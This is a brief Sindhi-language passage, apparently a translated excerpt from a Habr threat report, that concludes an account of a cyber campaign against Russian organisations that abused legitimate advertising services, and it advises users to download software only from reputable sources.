هي مهم سائبر حملن ۾ جائز اشتهارن جي خدمتن جي استعمال جو هڪ مثال آهي. اهو منصوبو روسي تنظيمن کي نشانو بڻائيندو آهي، پر اسان کي حيرت نه ٿيندي ته اهڙي حملي کي غير روسي خدمتون استعمال ڪندي ڏسي. سمجھوتا کان بچڻ لاء، صارفين کي سافٽ ويئر جي ماخذ جي شهرت ۾ يقين رکڻو پوندو جيڪي اھي ڊائون لوڊ ڪن ٿا.
سمجھوتي جي اشارن جي مڪمل فهرست ۽ MITER ATT&CK خاصيتن تي دستياب آھي .
جو ذريعو: www.habr.com